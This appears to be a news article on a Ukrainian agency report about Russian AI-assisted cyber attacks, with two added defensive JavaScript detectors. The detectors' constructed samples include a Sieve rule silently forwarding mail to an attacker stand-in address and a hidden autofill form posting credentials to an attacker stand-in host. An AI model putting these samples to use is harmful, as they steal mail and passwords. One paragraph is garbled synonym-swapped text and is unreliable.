
AI Becomes Russia's New Cyber Weapon in the War on Ukraine

Russian hackers' adoption of artificial intelligence (AI) in cyber attacks against Ukraine reached a new level in the first half of 2025 (H1 2025), the country's State Service for Special Communications and Information Protection (SSSCIP) said.

"Hackers now use it not only to generate phishing messages, but some of the malware samples we have analyzed show clear signs of being generated with AI – and attackers are certainly not going to stop there," the agency said in a report published Wednesday.

SSSCIP said 3,018 cyber incidents were recorded during the period, up from 2,575 in the second half of 2024 (H2 2024). Local authorities and military entities saw an increase in attacks compared to H2 2024, while attacks targeting the government and energy sectors declined.

One notable attack involved UAC-0219's use of malware called WRECKSTEEL against state administration bodies and critical infrastructure facilities in the country. There is evidence to suggest that the PowerShell data-stealing malware was developed using AI tools.


Some of the other campaigns registered against Ukraine are listed below:

  • Phishing campaigns orchestrated by UAC-0218 targeting defense forces to deliver HOMESTEEL using booby-trapped RAR archives
  • Phishing campaigns orchestrated by UAC-0226 targeting organizations involved in developing innovations for the defense industrial sector, local government bodies, military units, and law enforcement agencies to distribute a stealer called GIFTEDCROOK
  • Phishing campaigns orchestrated by UAC-0227 targeting local authorities, critical infrastructure facilities, and Territorial Recruitment and Social Support Centers (TRCs and SSCs) that leverage ClickFix-style tactics or SVG file attachments to distribute stealers such as Amatera Stealer and Strela Stealer
  • Phishing campaigns orchestrated by UAC-0125, a sub-cluster with ties to Sandworm, that sent email messages containing links to a website masquerading as ESET in order to deliver a C#-based backdoor named Kalambur (aka SUMBUR) under the guise of a threat removal tool

SSSCIP said it also observed the Russia-linked APT28 (aka UAC-0001) actors weaponizing vulnerabilities in the Roundcube (CVE-2023-43770, CVE-2024-37383, and CVE-2025-49113) and Zimbra (CVE-2024-27443 and CVE-2025-27915) webmail software, most of them cross-site scripting flaws, to conduct zero-click attacks.

"When exploiting such vulnerabilities, attackers typically injected malicious code that, via the Roundcube or Zimbra API, gained access to credentials, contact lists, and configured filters to forward all emails to attacker-controlled mailboxes," SSSCIP said.
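The forwarding filter is the part of this chain that survives after the injected script is gone, so it is worth hunting for directly. The script below is an added example, not code from the SSSCIP report or from the Roundcube or Zimbra projects: it audits a user's Sieve filter script for `redirect` actions that send mail to an address outside the organisation. Roundcube's managesieve plugin and Zimbra both store per-user filter rules as Sieve, so a dumped script is a convenient artifact; the organisation domain list and the sample script are constructed assumptions.

```javascript
// Added example: audit a Sieve filter script for mail-forwarding persistence.
// Assumption: the organisation's own mail domains are listed here.
const ORG_DOMAINS = ["example.gov.ua"];

// Constructed sample: one benign user rule plus a rule of the kind the report
// describes (every message silently copied to an attacker-controlled mailbox).
const SAMPLE_SIEVE = `require ["fileinto", "copy"];
# Move newsletters
if header :contains "subject" "newsletter" {
    fileinto "Newsletters";
}
# rule injected after webmail compromise
if true {
    redirect :copy "collector@mail-attacker.example";
}
`;

// Extract every redirect action: optional tagged arguments (:copy, :list, ...)
// followed by a quoted target address.
function findRedirects(script) {
  const re = /\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"/g;
  const hits = [];
  let m;
  while ((m = re.exec(script)) !== null) {
    hits.push({
      target: m[2],
      copy: /:copy/.test(m[1]),                       // :copy keeps the original, so the victim sees nothing
      line: script.slice(0, m.index).split("\n").length,
    });
  }
  return hits;
}

// A target is external when its domain is neither an org domain nor a subdomain of one.
function isExternal(address, orgDomains) {
  const domain = address.split("@").pop().toLowerCase();
  return !orgDomains.some((d) => domain === d || domain.endsWith("." + d));
}

function auditSieve(script, orgDomains = ORG_DOMAINS) {
  return findRedirects(script)
    .filter((r) => isExternal(r.target, orgDomains))
    .map((r) => ({
      ...r,
      severity: r.copy ? "high" : "medium",
      reason: r.copy
        ? "silent copy of every message to an external address"
        : "mail redirected to an external address",
    }));
}

for (const f of auditSieve(SAMPLE_SIEVE)) {
  console.log(`line ${f.line}: ${f.severity} - ${f.reason} (${f.target})`);
}
```

Run it over every script on the server rather than on one suspect mailbox: the report's point is that the rule is created through the webmail API after exploitation, so a newly appearing external `redirect :copy` in an account that never had filters is the signal, regardless of which CVE was used to get there.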


"Another method of stealing credentials using these vulnerabilities was to create hidden HTML blocks (visibility: hidden) with login and password input fields, where the attribute autocomplete="on" was set. This allowed the fields to be auto-filled with data saved in the browser, which was then exfiltrated."
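The trick works because a browser's password manager fills a password field whether or not the user can see it. The following is an added example, not code from the report or from either webmail project: a small tag walker that flags password inputs which are hidden (by their own style, the `hidden` attribute, or a hidden ancestor) and still allow autofill. The sample markup is constructed, and it is written without a DOM library so it runs stand-alone over a serialized page or mail body.

```javascript
// Added example: detect hidden credential fields that can harvest browser autofill.
// Constructed sample of an injected block of the kind SSSCIP describes.
const SAMPLE_HTML = `<p>Your message has been delivered.</p>
<div style="visibility: hidden">
  <form action="https://collector.attacker.example/grab" method="post">
    <input type="text" name="login" autocomplete="on">
    <input type="password" name="password" autocomplete="on">
  </form>
</div>`;

// Styles that make an element invisible to the user but not to the password manager.
const HIDDEN_STYLE = /visibility\s*:\s*hidden|display\s*:\s*none|opacity\s*:\s*0(?![.\d])/i;
const VOID_TAGS = new Set(["br", "img", "meta", "link", "hr", "area", "base", "col", "embed", "source", "track", "wbr"]);

// Read one attribute value (double-quoted, single-quoted or bare) from a tag's attribute string.
function attr(attrs, name) {
  const m = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, "i").exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Walk the tags, keeping a stack of open elements and whether each one is hidden.
function findHiddenCredentialInputs(html) {
  const tagRe = /<\/?([a-zA-Z][\w-]*)([^>]*)>/g;
  const stack = []; // { tag, hidden }
  const findings = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [raw, tag, attrs] = m;
    const name = tag.toLowerCase();
    if (raw.startsWith("</")) {
      // Pop back to the matching open tag; tolerates sloppy nesting.
      const i = stack.map((e) => e.tag).lastIndexOf(name);
      if (i >= 0) stack.length = i;
      continue;
    }
    const style = attr(attrs, "style") || "";
    const hiddenAttr = /(^|\s)hidden(?=[\s>=/]|$)/i.test(attrs); // boolean `hidden` attribute
    const hidden = hiddenAttr || HIDDEN_STYLE.test(style);
    const inherited = stack.some((e) => e.hidden);
    if (name === "input") {
      const type = (attr(attrs, "type") || "text").toLowerCase();
      // autocomplete defaults to "on", so an absent attribute is as good as the explicit one.
      const autocomplete = (attr(attrs, "autocomplete") || "on").toLowerCase();
      if ((hidden || inherited) && type === "password" && autocomplete !== "off") {
        findings.push({ name: attr(attrs, "name"), hiddenBy: hidden ? "self" : "ancestor" });
      }
      continue; // input is a void element, never pushed
    }
    if (!VOID_TAGS.has(name) && !raw.endsWith("/>")) stack.push({ tag: name, hidden });
  }
  return findings;
}

for (const f of findHiddenCredentialInputs(SAMPLE_HTML)) {
  console.log(`hidden password field "${f.name}" (hidden by ${f.hiddenBy})`);
}
```

Because the block is injected by the attacker's script at run time, the place to run this is the live page (for instance from an extension or an instrumented browser during triage), not the stored mail source; a match inside a webmail origin that has no legitimate login form on that screen is a strong indicator. On the defensive side, `autocomplete="off"` on the real login form does not help here, since it is the attacker's fields that are being filled; what does help is patching the webmail and keeping credentials out of the browser's store for that origin.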

The company additionally revealed that Russia continues to have interaction in hybrid warfare, synchronizing its cyber operations at the side of kinetic assaults on the battlefield, with the Sandworm (UAC-0002) group concentrating on organizations within the vitality, protection, web service suppliers, and analysis sectors.


Furthermore, several threat groups targeting Ukraine have resorted to abusing legitimate services, such as Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io, and mocky.io, to host malware or phishing pages, or to turn them into a data exfiltration channel.

"The use of legitimate online resources for malicious purposes is not a new tactic," SSSCIP said. "However, the number of such platforms exploited by Russian hackers has been steadily growing in recent times."
